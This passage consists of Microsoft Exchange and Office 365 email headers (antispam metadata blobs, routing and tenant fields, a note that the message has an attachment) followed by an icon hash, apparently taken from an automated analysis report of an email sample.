                                                                                                                      x-microsoft-antispam-message-info-originalVRTQ6bytKlkHLLdfFZEePUS8cqXiqwsWAf3jVfJjD6RhjtjThZ0MOspH/a53zpv98qq0M0KdS3+4Bhz4lLdNHBzhVH9vJsweu8/ivt82v0ruoxv8BjBz0QuxC/E9sKlQxJ5zs2UT9kICtCvrcWcMpFNL8Z2jwjrmCDgFsHe+9tJq3DJ5uokm7DL5CKiv8XhHoZQw7YL6grDipreNZVJfVTMgX5BUI+t5cwxI8/zcyy8ALRO3A7QPmxItwfC4xYIOCN4Oe+p+8Vtr2M67F+pUZCkwf0sAMHkso/zaS9fRgo3ezFx+8nBcr0GRIIET6SMcpsm3nAMMRS6N3rXnhqPcO2D/LeyVca4z3GIWE+pdMysDN4GHqTRbMFAS0+DWgtDEOWbJR79soQ3UqALjxPJqc/56fAY2I3E1WlUjxytL1WO5ybG09uWq+wi/uLGB4llCt628T0n3Tux8j7AtIOabAbdNPuzkJuT4+AMhe93/rgMR9A7ERXNUcsoXUcE3bV8nStkNFhMQOjuHhm6hjCH+02uxvyLzQsqWg6+fzIqcbj5E2PTYzMOTtbKojESg/SN6kfnIeqnAWAuDsaERFlyE82RmeFJ9XWjEW2a8GDfxAwghibYb+Cf+o9mqBiBJQjr4djpNMwu0b7QAL5/XdKyMifJS0XXiGkiurhQJaSS3U5gB5wQ2vIVCgogunH3DoEKeJJn+Gx58vfRwbUnjMYrWL8YeEtADWfWior37UuCbfyy++Eebnm9ErJDeRGrdjiObfIdUdgiEsCv2N0HcVm5TpExB4x8i4TccIfZwv7rgLugO1v2aMVkCIAw4vkCRU6drYrcMjyN1xWsw7nwt5R6rODXCgW3q8E2ntEc51kmhKW430O87db5naL+h6YasNen6Em80PXGCnA4MeSQ6RLR/5xI7zFkU7LhXe8KOukV7wxqong9FESar8Gy9f2RCCb49lWrLNmrDq0OSvicgngq67VV7a7n199yu9aXifBkS8LLoGidRxOZIonxs5hC1lnRJvuAC1gT7HepQfgx5MLlb7LIFD49HOAFGkk2GoZZKsmBU4ZdGwA2IA03CAElMvIvQmtaLkPmAWUvK200oPRetKkrcqf41+IwXYqUA4ScPQnvQ8fZnscPqusp4BjhT3+2bx3DPkeDTA6yFcOERqGVRkbeQPnOIWct3ODY05CgfG+0jQYqFdkYYjE1thkLYSjIhjkx8zYN3KLsLzahahthbUF9xAnrVV24ULXDjHRoJDETdJsfiHEyX+g+gD1xpqPg+tZEY72CIRuFtFwaEO582tGOFjycGTLjJEA5d57Qj13/rY1TEHSkl+p0tV+w+FwtSFxGn7btQsfFXaXqkR6ybZcXGF2GsX0tUUWGaimMgXaZTCeFEPaDvMHD2hYojM5p6
                                                                                                                      x-microsoft-antispam-untrustedBCL:0;ARA:13230040|1800799024|376014|366016|7416014|38070700018|13003099007|4053099003|8096899003;
                                                                                                                      x-ms-exchange-antispam-messagedata-original-0sL8DLR0sET32C0egRGW1/AtbcTrfD6SIh3bRlEU1s7gLI0BdwKm5su8Ltu6/4azK5QygYkw5duwJ0g4qdHycv7UAya4LgKJbnCFQQwuNW/JT9axWPKigKbZ4lGxD8kKwIZkFzksuyTFFQhpCKf9LGKWIM79fFlOFuT5562DBT6k5YXM8OJDH8cfLZUXj6RfcPlwym4d9K9zOlehRf2fItgFzcJ5Ww2a/jCoopo0virBuMKXxnL1+NDGrFtRfj5WC+P0S4s8yyWIXf4JhbmndNT/fU31+eYc7yfYMLqwYHMOKnRaSdy5QCOVeG2GX0L6wtP+wOiNTlsdW0Eat218jhIvNs/jUhWtRwTj936veLpGMUMD4rWzfAd5EKZSTL9Ntlnrv8Zdp7VewM6ICVdK8RyRV5MUVtQPMSFdJt+L91q6j3+KYqZGYD17/lIiEBTDG0mxP0DvJE/AlbSulDX9XspIhvkFxi189Ji0xklg0aM/U0xOphErMsXrBJG6St61dcvKUuS967gxMD0Lrj9mXyWIBHYZFui4H587N19P7fhNfajxvbBBdA36vIxljYdsm14VCDLbyu0IeZQlDqOB+/rQjxk0OFGP8YZL/cEKyYN7HGt2+/tHqDZK+f9oZEl5nYEmUCqW7oY4ZzH9ICnbFWBeaaIK5PuSM8XT44YhAu/MVb/wPHHROJr3l8qhG20s42YcAM9Nar+ZJ0FqW+YTqv/FK211NBcD3yLvwFt83YoqKgNO46xn34/BgjzqP/eH8pxCdXmxznkLmqxvAmS3s2nKbQS0crA/XIQMnPvWsB7+vXGenyomkUHQ9/Q7vk+HZtuBpZmgIQ1/eWpxwHHx9OzdF2ePMGosMnhc0Orz8LB3nyXtNdVLNhWyz9aWK3VG4kHxwYH4DBRPOR2aZhoXaaQiZVzryN0Tx0K2nbu0eRwuL5mhHht8bHEVYt3Ty20Wejz9LR3GcO72q/D1abaOz8bACP2NsLR88n1OM+wwoCamLhmkNPp2bCWkRNKMdmbGrs8WF/vVQyEUt5kteUszPJKkZW9mBuZJPyPciqLuq1RoL/HE7BIBpr/5mZZgt6DvoQIYNgFn3C6lqutdFJqpM3iV7oxY4aBJP6xyfF6c5IJ08+1+1dowYZ0UcPRRynUoBf8anmFr9NzMLpt53B6Hf+h6zw8Ujim2RGcJiwZdBIHBmWYDIhO6XDmF1XUYJMBD6eex4ZQ3mlbM0FcFUBWMnB86EXqo9gwFxRNoQI1lhMafpT0guCQs5gwqlnZZvdAnFsYJrI9QAH31tUmBB/KppA8AznMMXrmwH0QIFpd8hqhk+fjMgYTA8aY4MOFeMeoBIESwnmCRANGj9ER7W/i5mYLDtTcPDHAfocGKZ/zZOrDIcwm3sPm0DO70bqGoDaXhYFn5hqzZNLnAWz57pP38XU77frdUOc93GgsRCBi5dlFIHIx3e/6kUv7s5Q37O86yhMejSKLlGYJdAy8vK6sLK9XrtDYnGUqz0En/puNqdIHL8wPXpw56kK5THoYSb5V9zkAIE0JkZQHR4TzG6yNRX5lAcwPjwD3i2rUkPazK70Rc=
                                                                                                                      x-ms-exchange-antispam-messagedata-original-chunkcount1
                                                                                                                      x-ms-exchange-antispam-relay0
                                                                                                                      x-ms-exchange-atpmessagepropertiesSA|SL
                                                                                                                      x-ms-exchange-crosstenant-authasAnonymous
                                                                                                                      x-ms-exchange-crosstenant-authsource DU2PEPF00028D07.eurprd03.prod.outlook.com
                                                                                                                      x-ms-exchange-crosstenant-fromentityheaderInternet
                                                                                                                      x-ms-exchange-crosstenant-id60970b94-e7fb-4b69-b637-2cb121e1b596
                                                                                                                      x-ms-exchange-crosstenant-network-message-id 42309189-a718-4164-6e83-08dd6bb915f6
                                                                                                                      x-ms-exchange-crosstenant-originalarrivaltime25 Mar 2025 16:21:23.5415 (UTC)
                                                                                                                      x-ms-exchange-organization-authasAnonymous
                                                                                                                      x-ms-exchange-organization-authsource DU2PEPF00028D07.eurprd03.prod.outlook.com
                                                                                                                      x-ms-exchange-organization-expirationinterval1:00:00:00.0000000
                                                                                                                      x-ms-exchange-organization-expirationintervalreasonOriginalSubmit
                                                                                                                      x-ms-exchange-organization-expirationstarttime 25 Mar 2025 16:21:23.8071 (UTC)
                                                                                                                      x-ms-exchange-organization-expirationstarttimereasonOriginalSubmit
                                                                                                                      x-ms-exchange-organization-messagedirectionalityIncoming
                                                                                                                      x-ms-exchange-organization-network-message-id 42309189-a718-4164-6e83-08dd6bb915f6
                                                                                                                      x-ms-exchange-organization-scl1
                                                                                                                      x-ms-exchange-processed-by-bccfoldering15.20.8534.033
                                                                                                                      x-ms-exchange-senderadcheck1
                                                                                                                      x-ms-exchange-transport-crosstenantheaderspromoted DU2PEPF00028D07.eurprd03.prod.outlook.com
                                                                                                                      x-ms-exchange-transport-crosstenantheadersstamped SA3PR18MB5603, VI1P194MB0574
                                                                                                                      x-ms-exchange-transport-crosstenantheadersstripped DU2PEPF00028D07.eurprd03.prod.outlook.com
                                                                                                                      x-ms-exchange-transport-endtoendlatency00:04:20.0314380
                                                                                                                      x-ms-has-attachyes
                                                                                                                      x-ms-office365-filtering-correlation-id42309189-a718-4164-6e83-08dd6bb915f6
                                                                                                                      x-ms-office365-filtering-correlation-id-prvs af102106-b200-4998-2b15-08dd6bb9116f
                                                                                                                      x-ms-publictraffictypeEmail
                                                                                                                      x-ms-traffictypediagnosticBY3PR18MB4705:EE_|SA3PR18MB5603:EE_|DU2PEPF00028D07:EE_|VI1P194MB0574:EE_|BN0PR01MB7120:EE_|BN7PR01MB3796:EE_
                                                                                                                      Content-Typemultipart/mixed; boundary="===============9111259758626489696=="

                                                                                                                      Icon Hash:46070c0a8e0c67d6